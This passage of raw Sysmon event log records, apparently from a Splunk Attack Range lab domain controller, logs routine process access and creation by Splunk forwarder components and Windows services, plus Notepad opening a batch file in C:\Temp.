Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E58BE6FCAB49A96B91209191C90275D,SHA256=16CFE8C51F60CCB1D949BA166A83B5A72AA004B503E801432756EAF3E3EC2D56,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:03.771{266CAFBE-665F-6064-6901-00000000AE01}67406736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:03.756{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=529DC9F55DD4662AE953EC69B0738C67,SHA256=44C665755A07602A6F64BEDB90DE557D6C4F19DF7F897CCE12BAD83414E3113B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:03.615{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-665F-6064-6901-00000000AE01}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:03.615{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:03.615{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:03.615{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:03.615{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:03.615{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-665F-6064-6901-00000000AE01}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:03.615{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-665F-6064-6901-00000000AE01}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:03.616{266CAFBE-665F-6064-6901-00000000AE01}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000010644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.974{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.974{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.974{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.974{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x800000000000000010640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:03.491{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53706-false10.0.1.12-8000- 23542300x800000000000000010639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.787{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7292A7B2B51D21774A8EA60EFC58CBC8,SHA256=458711C8E9B149F8D1D6AA6F7574313DDB1B5545948676D1832334AF3C4AC3F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.709{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.709{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.709{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.709{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.709{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.709{266CAFBE-64C5-6064-A500-00000000AE01}43565668C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+17d35c|C:\Windows\System32\SHELL32.dll+1981d8|C:\Windows\System32\SHELL32.dll+2845d3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+17d600 154100x800000000000000010632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.716{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\notepad.exe10.0.14393.4169 (rs1_release.210107-1130)NotepadMicrosoft® Windows® Operating SystemMicrosoft CorporationNOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Temp\1.batC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=BA78FCF8CA9D806C6C047357E31748DE,SHA256=34A07759492E31AEC2A009505FE8DFB50242375C4308AD4657B2872F4F75A077,IMPHASH=968239BE2020F1C0DAFFDCDBD49E9C82{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x800000000000000010631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.709{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6660-6064-6A01-00000000AE01}2504C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.709{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.709{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.709{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.709{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.709{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6660-6064-6A01-00000000AE01}2504C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.709{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6660-6064-6A01-00000000AE01}2504C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.710{266CAFBE-6660-6064-6A01-00000000AE01}2504C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 